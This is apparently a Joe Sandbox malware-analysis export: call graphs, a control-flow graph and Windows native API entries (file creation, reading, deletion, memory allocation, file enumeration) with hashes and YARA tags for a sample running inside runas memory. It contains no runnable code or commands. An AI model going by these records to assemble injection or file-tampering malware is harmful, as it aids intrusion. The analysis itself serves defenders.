5163a7 99696->99698 99699 513d50 99696->99699 99706 51b7c0 99699->99706 99701 513d91 99702 504840 2 API calls 99701->99702 99704 513e9e 99701->99704 99705 513dd7 99702->99705 99703 513e20 Sleep 99703->99705 99704->99698 99705->99703 99705->99704 99709 519900 99706->99709 99708 51b7ee 99708->99701 99710 519992 99709->99710 99712 51992b 99709->99712 99711 5199a8 NtAllocateVirtualMemory 99710->99711 99711->99708 99712->99708 99713 519700 99714 519777 99713->99714 99716 51972e 99713->99716 99715 51978d NtDeleteFile 99714->99715 99717 518d80 99718 518d9a 99717->99718 99721 4522df0 LdrInitializeThunk 99718->99721 99719 518dc2 99721->99719 99722 5073f0 99723 50740c 99722->99723 99727 507459 99722->99727 99725 5197a0 NtClose 99723->99725 99723->99727 99724 507591 99726 507424 99725->99726 99732 506820 NtClose LdrInitializeThunk LdrInitializeThunk 99726->99732 99727->99724 99733 506820 NtClose LdrInitializeThunk LdrInitializeThunk 99727->99733 99729 50756b 99729->99724 99734 5069f0 NtClose LdrInitializeThunk LdrInitializeThunk 99729->99734 99732->99727 99733->99729 99734->99724 99735 517030 99736 517095 99735->99736 99737 5170c0 99736->99737 99740 510d70 99736->99740 99739 5170a2 99741 510d8a 99740->99741 99743 510b20 99740->99743 99742 510d5c 99742->99739 99743->99742 99744 5066a0 LdrInitializeThunk 99743->99744 99745 519260 LdrInitializeThunk 99743->99745 99746 5197a0 NtClose 99743->99746 99744->99743 99745->99743 99746->99743 99747 515ab0 99748 515b12 99747->99748 99750 515b1f 99748->99750 99751 507650 99748->99751 99752 507633 99751->99752 99753 50768d 99751->99753 99754 50b540 9 API calls 99752->99754 99753->99750 99755 507642 99754->99755 99755->99750 99756 511df0 99757 511e09 99756->99757 99758 511e51 99757->99758 99761 511e91 99757->99761 99763 511e96 99757->99763 99759 51b840 RtlFreeHeap 99758->99759 99760 511e61 99759->99760 99762 51b840 RtlFreeHeap 99761->99762 99762->99763 99770 5033f3 99775 508030 99770->99775 99772 50341f 99774 5197a0 NtClose 99774->99772 99776 503403 99775->99776 99777 50804a 99775->99777 99776->99772 99776->99774 99781 518e70 99777->99781 99780 5197a0 NtClose 99780->99776 99782 518e8a 99781->99782 99785 45235c0 LdrInitializeThunk 99782->99785 99783 50811a 99783->99780 99785->99783 99786 4f9de0 99788 4fa13c 99786->99788 99789 4fa522 99788->99789 99790 51b4c0 99788->99790 99791 51b4e6 99790->99791 99796 4f4070 99791->99796 99793 51b4f2 99795 51b52b 99793->99795 99799 5158d0 99793->99799 99795->99789 99798 4f407d 99796->99798 99803 503500 99796->99803 99798->99793 99800 515932 99799->99800 99802 51593f 99800->99802 99814 501cc0 99800->99814 99802->99795 99804 50351a 99803->99804 99806 503530 99804->99806 99807 51a210 99804->99807 99806->99798 99809 51a22a 99807->99809 99808 51a259 99808->99806 99809->99808 99810 518dd0 LdrInitializeThunk 99809->99810 99811 51a2b6 99810->99811 99812 51b840 RtlFreeHeap 99811->99812 99813 51a2cc 99812->99813 99813->99806 99815 501cfb 99814->99815 99830 508140 99815->99830 99817 501d03 99818 501fc3 99817->99818 99819 51b920 RtlAllocateHeap 99817->99819 99818->99802 99820 501d19 99819->99820 99821 51b920 RtlAllocateHeap 99820->99821 99822 501d2a 99821->99822 99823 51b920 RtlAllocateHeap 99822->99823 99824 501d37 99823->99824 99829 501dbf 99824->99829 99845 506cf0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99824->99845 99826 504840 2 API calls 99827 501f72 99826->99827 99841 518210 99827->99841 99829->99826 99831 50816c 99830->99831 99832 508030 2 API calls 99831->99832 99833 50818f 99832->99833 99834 5081b1 99833->99834 99835 508199 99833->99835 99836 5081cd 99834->99836 99839 5197a0 NtClose 99834->99839 99837 5081a4 99835->99837 99838 5197a0 NtClose 99835->99838 99836->99817 99837->99817 99838->99837 99840 5081c3 99839->99840 99840->99817 99842 518272 99841->99842 99844 51827f 99842->99844 99846 501fe0 99842->99846 99844->99818 99845->99829 99848 502000 99846->99848 99862 508410 99846->99862 99855 502553 99848->99855 99866 511430 99848->99866 99850 50205e 99850->99855 99870 51c8e0 99850->99870 99852 502217 99853 51ca10 2 API calls 99852->99853 99856 50222c 99853->99856 99854 5083b0 LdrInitializeThunk 99858 502273 99854->99858 99855->99844 99856->99858 99875 500b00 99856->99875 99858->99854 99858->99855 99860 500b00 LdrInitializeThunk 99858->99860 99859 5083b0 LdrInitializeThunk 99861 5023c1 99859->99861 99860->99858 99861->99858 99861->99859 99863 50841d 99862->99863 99864 508445 99863->99864 99865 50843e SetErrorMode 99863->99865 99864->99848 99865->99864 99867 511449 99866->99867 99868 51b7c0 NtAllocateVirtualMemory 99867->99868 99869 511451 99868->99869 99869->99850 99871 51c8f0 99870->99871 99872 51c8f6 99870->99872 99871->99852 99873 51b920 RtlAllocateHeap 99872->99873 99874 51c91c 99873->99874 99874->99852 99876 500b0e 99875->99876 99879 519a20 99876->99879 99880 519a3a 99879->99880 99883 4522c70 LdrInitializeThunk 99880->99883 99881 500b1f 99881->99861 99883->99881 99884 4fb7e0 99885 51b7c0 NtAllocateVirtualMemory 99884->99885 99886 4fce51 99884->99886 99885->99886 99887 50c8a0 99889 50c8c9 99887->99889 99888 50c9cd 99889->99888 99890 50c973 FindFirstFileW 99889->99890 99890->99888 99892 50c98e 99890->99892 99891 50c9b4 FindNextFileW 99891->99892 99893 50c9c6 FindClose 99891->99893 99892->99891 99893->99888 99894 50fb20 99895 50fb84 99894->99895 99896 506590 2 API calls 99895->99896 99898 50fcb7 99896->99898 99897 50fcbe 99898->99897 99923 5066a0 99898->99923 99900 50fd3a 99901 50fe72 99900->99901 99920 50fe63 99900->99920 99927 50f900 99900->99927 99902 5197a0 NtClose 99901->99902 99904 50fe7c 99902->99904 99905 50fd76 99905->99901 99906 50fd81 99905->99906 99907 51b920 RtlAllocateHeap 99906->99907 99908 50fdaa 99907->99908 99909 50fdb3 99908->99909 99910 50fdc9 99908->99910 99911 5197a0 NtClose 99909->99911 99936 50f7f0 CoInitialize 99910->99936 99913 50fdbd 99911->99913 99914 50fdd7 99939 519260 99914->99939 99916 50fe52 99917 5197a0 NtClose 99916->99917 99918 50fe5c 99917->99918 99919 51b840 RtlFreeHeap 99918->99919 99919->99920 99921 50fdf5 99921->99916 99922 519260 LdrInitializeThunk 99921->99922 99922->99921 99924 5066c5 99923->99924 99943 5190e0 99924->99943 99928 50f91c 99927->99928 99929 504840 2 API calls 99928->99929 99931 50f93a 99929->99931 99930 50f943 99930->99905 99931->99930 99932 504840 2 API calls 99931->99932 99933 50fa0e 99932->99933 99934 504840 2 API calls 99933->99934 99935 50fa68 99933->99935 99934->99935 99935->99905 99938 50f855 99936->99938 99937 50f8eb CoUninitialize 99937->99914 99938->99937 99940 51927a 99939->99940 99948 4522ba0 LdrInitializeThunk 99940->99948 99941 5192aa 99941->99921 99944 5190fd 99943->99944 99947 4522c60 LdrInitializeThunk 99944->99947 99945 506739 99945->99900 99947->99945 99948->99941 99949 5025e0 99950 502582 99949->99950 99951 5025eb 99949->99951 99952 5025a6 99950->99952 99953 518dd0 LdrInitializeThunk 99950->99953 99956 519830 99952->99956 99953->99952 99955 5025bb 99957 5198bf 99956->99957 99959 51985e 99956->99959 99961 4522e80 LdrInitializeThunk 99957->99961 99958 5198f0 99958->99955 99959->99955 99961->99958 99962 511a60 99963 511a7c 99962->99963 99964 511aa4 99963->99964 99965 511ab8 99963->99965 99966 5197a0 NtClose 99964->99966 99967 5197a0 NtClose 99965->99967 99968 511aad 99966->99968 99969 511ac1 99967->99969 99972 51b960 RtlAllocateHeap 99969->99972 99971 511acc 99972->99971 99973 510420 99974 51043d 99973->99974 99975 504840 2 API calls 99974->99975 99976 51045b 99975->99976 99982 5194a0 99983 519557 99982->99983 99985 5194d2 99982->99985 99984 51956d NtCreateFile 99983->99984 99993 508aa3 99994 508aa8 99993->99994 99995 508a94 99993->99995 99994->99995 99997 507370 99994->99997 99998 507386 99997->99998 100000 5073bf 99997->100000 99998->100000 100001 5071e0 LdrLoadDll LdrLoadDll 99998->100001 100000->99995 100001->100000 100002 5115ee 100003 511600 100002->100003 100015 519610 100003->100015 100005 51160f 100006 511642 100005->100006 100007 51162d 100005->100007 100009 5197a0 NtClose 100006->100009 100008 5197a0 NtClose 100007->100008 100010 511636 100008->100010 100012 51164b 100009->100012 100011 511682 100012->100011 100013 51b840 RtlFreeHeap 100012->100013 100014 511676 100013->100014 100016 5196b4 100015->100016 100018 51963b 100015->100018 100017 5196ca NtReadFile 100016->100017 100017->100005 100018->100005

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 26 4f9de0-4fa13a 27 4fa14b-4fa157 26->27 28 4fa159-4fa166 27->28 29 4fa168-4fa179 27->29 28->27 31 4fa18a-4fa196 29->31 32 4fa198-4fa1a5 31->32 33 4fa1a7-4fa1b1 31->33 32->31 34 4fa1c2-4fa1ce 33->34 36 4fa1de-4fa1f6 34->36 37 4fa1d0-4fa1dc 34->37 38 4fa207-4fa210 36->38 37->34 40 4fa226-4fa22f 38->40 41 4fa212-4fa224 38->41 42 4fa235-4fa23f 40->42 43 4fa452-4fa45c 40->43 41->38 46 4fa250-4fa259 42->46 45 4fa46d-4fa476 43->45 47 4fa478-4fa488 45->47 48 4fa495-4fa49f 45->48 49 4fa25b-4fa267 46->49 50 4fa277-4fa28a 46->50 53 4fa48a-4fa490 47->53 54 4fa493 47->54 55 4fa4b0-4fa4bc 48->55 51 4fa269-4fa26f 49->51 52 4fa275 49->52 56 4fa29b-4fa2a5 50->56 51->52 52->46 53->54 54->45 59 4fa4be-4fa4cb 55->59 60 4fa4d8-4fa4df 55->60 61 4fa2a7-4fa2d1 56->61 62 4fa2d3-4fa2dd 56->62 64 4fa4cd-4fa4d3 59->64 65 4fa4d6 59->65 67 4fa567-4fa570 60->67 68 4fa4e5-4fa4ec 60->68 61->56 66 4fa2ee-4fa2fa 62->66 64->65 65->55 72 4fa2fc-4fa308 66->72 73 4fa30a-4fa314 66->73 69 4fa58c-4fa596 67->69 70 4fa572-4fa58a 67->70 74 4fa4ee-4fa51b 68->74 75 4fa51d call 51b4c0 68->75 70->67 72->66 78 4fa325-4fa32e 73->78 74->68 79 4fa522-4fa52c 75->79 80 4fa34c-4fa35b 78->80 81 4fa330-4fa33c 78->81 84 4fa53d-4fa549 79->84 85 4fa35d 80->85 86 4fa362-4fa376 80->86 82 4fa33e-4fa344 81->82 83 4fa34a 81->83 82->83 83->78 84->67 88 4fa54b-4fa557 84->88 85->43 89 4fa387-4fa393 86->89 90 4fa559-4fa55f 88->90 91 4fa565 88->91 92 4fa3a6-4fa3b0 89->92 93 4fa395-4fa3a4 89->93 90->91 91->84 96 4fa3c1-4fa3cb 92->96 93->89 97 4fa41f-4fa426 96->97 98 4fa3cd-4fa41d 96->98 100 4fa44d 97->100 101 4fa428-4fa44b 97->101 98->96 100->40 101->97
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$$I$1$3[$3[$=$?v$D$E$H$P$V]$W$$W$$]$^$e:$e|$k$lY$m$r$w6$|N$8
                                                                                                              • API String ID: 0-1752912700
                                                                                                              • Opcode ID: 3eac154be1e29a7eb7162fa120cc200f8b47f6ee9f84fee90962fe48ca1160cd
                                                                                                              • Instruction ID: 7ea713a6bfb38d31800287baa11287206189825081d0c0c7b3a10ac6d9eeada9
                                                                                                              • Opcode Fuzzy Hash: 3eac154be1e29a7eb7162fa120cc200f8b47f6ee9f84fee90962fe48ca1160cd
                                                                                                              • Instruction Fuzzy Hash: 0A226FB0D0522CCBEB24CF45C994BEDBBB2BB45308F1081DAC50D6B281C7B95A99DF56
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0050C984
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0050C9BF
                                                                                                              • FindClose.KERNELBASE(?), ref: 0050C9CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 9e98eb2d0b99c6d6241c35b8b61864dc414000d5f196c19a70df0a0435f512d5
                                                                                                              • Instruction ID: 99d86e119d866c7960f07253e2a6746fc4f9660debb683a1adf1e35f9f95c6d7
                                                                                                              • Opcode Fuzzy Hash: 9e98eb2d0b99c6d6241c35b8b61864dc414000d5f196c19a70df0a0435f512d5
                                                                                                              • Instruction Fuzzy Hash: 50317372600309BBEB20DB60CC86FFF7B7CAB85744F144559FA49A6181D770AA85CBA0
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,FECAB67C,?,?,?,?,?,?,?,?), ref: 0051959E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 8b2f8a90cbcb9c51e23d35672095220602af1adf597b7b9044390d8898631838
                                                                                                              • Instruction ID: 301d0257cea865e9f9dd4a092ad41158e068a028c4a647458d23ac37922272e2
                                                                                                              • Opcode Fuzzy Hash: 8b2f8a90cbcb9c51e23d35672095220602af1adf597b7b9044390d8898631838
                                                                                                              • Instruction Fuzzy Hash: DE31F4B1A01248AFDB14DF98D881EEEBBB9EF8C704F108109F908A7341D770A941CBA4
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,FECAB67C,?,?,?,?,?,?), ref: 005196F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: c9d66426c858a190bcf0ba12ecc6669d26d004e9f3ccde46ee16ef4e20202938
                                                                                                              • Instruction ID: ac561ca8021f93c719f7cb8139ff7f9efb999dfbaf7e21b30c1bc8ba793822d7
                                                                                                              • Opcode Fuzzy Hash: c9d66426c858a190bcf0ba12ecc6669d26d004e9f3ccde46ee16ef4e20202938
                                                                                                              • Instruction Fuzzy Hash: BC310AB5A00249AFDB14DF98D881EEFB7B8EF8C714F108219F918A7341D770A941CBA5
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(0050205E,?,FECAB67C,00000000,00000004,00003000,?,?,?,?,?,0051827F,0050205E,?,0051B7EE,0051827F), ref: 005199C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 7105b53df433aa1ebde741e09c5036428d86e6b2d46f5145a4f3265435cb635f
                                                                                                              • Instruction ID: 64b0cf7fb47a5472352910bb9ee0ad7224774ac410f38b642ca090e0d00ccf53
                                                                                                              • Opcode Fuzzy Hash: 7105b53df433aa1ebde741e09c5036428d86e6b2d46f5145a4f3265435cb635f
                                                                                                              • Instruction Fuzzy Hash: 15215EB5601249AFDB10DF98CC41EEF77B8EF89700F10850AFD08A7241D774A951CBA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: c26d3cd6e071d1d6abc6115a1b7b9aac1fec755140daddfe6fc85a1820dbb4ed
                                                                                                              • Instruction ID: f16f6a90003df97ebb6ee4f8199aae3b63fa51717897af8e039b08551f817c95
                                                                                                              • Opcode Fuzzy Hash: c26d3cd6e071d1d6abc6115a1b7b9aac1fec755140daddfe6fc85a1820dbb4ed
                                                                                                              • Instruction Fuzzy Hash: B811E371501648BBE620EBA4CC06FFB776CEF85714F104509FA04AB181D7717985C7A5
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005197D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction ID: fc3a450ac7fd2bd170469de49009ce86a6814a4ce2101c00aa1bd074cbf9e4e9
                                                                                                              • Opcode Fuzzy Hash: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction Fuzzy Hash: 5DE04F322442047BD110AA6ACC02FDB776CDBC6755F00851AFA48A7242C771794087E4
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4fdda6b9ab1658639adaf3a47f3b4a1db62f9190dd121d3bb2250311d7d98268
                                                                                                              • Instruction ID: 45ae9712cec45a2bad26bc24b9ce22089e32e7148ace342bf72ba12012cc5c07
                                                                                                              • Opcode Fuzzy Hash: 4fdda6b9ab1658639adaf3a47f3b4a1db62f9190dd121d3bb2250311d7d98268
                                                                                                              • Instruction Fuzzy Hash: 36900261601500436144715848044066195ABE1316399C115B0559560C8618D955B269
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c2542130782ae9834355d18be421ee0090db5814993bf9863286cfad9632b5ee
                                                                                                              • Instruction ID: da61772bf63f64defa5e102aa9fa55f915db05155c6518bbfff8f4d0cfc0dac8
                                                                                                              • Opcode Fuzzy Hash: c2542130782ae9834355d18be421ee0090db5814993bf9863286cfad9632b5ee
                                                                                                              • Instruction Fuzzy Hash: 1C90023160580013B144715848845464195ABE0316B59C011F0429554C8A14DA567361
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ba0c723fa76b0ef282d0423d99773d682d42ae85ac22795c700571bec9b44ed6
                                                                                                              • Instruction ID: 0d46f65ee71b0cae64d9be97814b6a81f0636c625cc198862e19e7bf212094e3
                                                                                                              • Opcode Fuzzy Hash: ba0c723fa76b0ef282d0423d99773d682d42ae85ac22795c700571bec9b44ed6
                                                                                                              • Instruction Fuzzy Hash: D490023120148803F1147158840474A01959BD0316F5DC411B4429658D8695D9917121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 761eb1ea7339d19d3dd74d2ae51ec3117713c8088cd79c244101181915c2853a
                                                                                                              • Instruction ID: d356947948551b17fe5c0b6d4ce0ec92a9769ae70421e4921675d5cd8d7ffbc6
                                                                                                              • Opcode Fuzzy Hash: 761eb1ea7339d19d3dd74d2ae51ec3117713c8088cd79c244101181915c2853a
                                                                                                              • Instruction Fuzzy Hash: DF90023120140843F10471584404B4601959BE0316F59C016B0129654D8615D9517521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 882e8692bdd61cd2498563797a57c129c0b0ded88b6125645b6b67fa98875fca
                                                                                                              • Instruction ID: c4266a55ae6fe5b24e4a990c69acd933f021b0f35815719dccccff06961e8675
                                                                                                              • Opcode Fuzzy Hash: 882e8692bdd61cd2498563797a57c129c0b0ded88b6125645b6b67fa98875fca
                                                                                                              • Instruction Fuzzy Hash: 9990023120140403F1047598540864601959BE0316F59D011B5029555EC665D9917131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d0e53273a3c89b52a9d34443c7e011b210c8ca9024df59e3057e0c3cbc177701
                                                                                                              • Instruction ID: fcb5e0e1d488d64e5551fb409b18f10eed62e7d649f6fa937bd985bafa88629e
                                                                                                              • Opcode Fuzzy Hash: d0e53273a3c89b52a9d34443c7e011b210c8ca9024df59e3057e0c3cbc177701
                                                                                                              • Instruction Fuzzy Hash: 7190022921340003F1847158540860A01959BD1217F99D415B001A558CC915D9697321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 85d32e4c175b3aa4d0eccfece38c3059f88edff62216f2ec5b7e42867235afb1
                                                                                                              • Instruction ID: 218f2e35639e4c75ac31b5f4b1fa2baa83b7e861c7a142d0eec285252db6da5f
                                                                                                              • Opcode Fuzzy Hash: 85d32e4c175b3aa4d0eccfece38c3059f88edff62216f2ec5b7e42867235afb1
                                                                                                              • Instruction Fuzzy Hash: 0A90022130140003F144715854186064195EBE1316F59D011F0419554CD915D9567222
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2728481a5f565f91543f18b6f5abae8908ea6618e7161b80bbadbf09adf99b05
                                                                                                              • Instruction ID: 25ecf390784053fec7ccb6d3d8b0e4656e41fe6a53ba1d5ce23c95a0697c799a
                                                                                                              • Opcode Fuzzy Hash: 2728481a5f565f91543f18b6f5abae8908ea6618e7161b80bbadbf09adf99b05
                                                                                                              • Instruction Fuzzy Hash: 96900221242441537549B15844045074196ABE0256799C012B1419950C8526E956F621
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bb967f8c92928b2207bc6010ba68847709ef909c993a3ac4170f44aacee31856
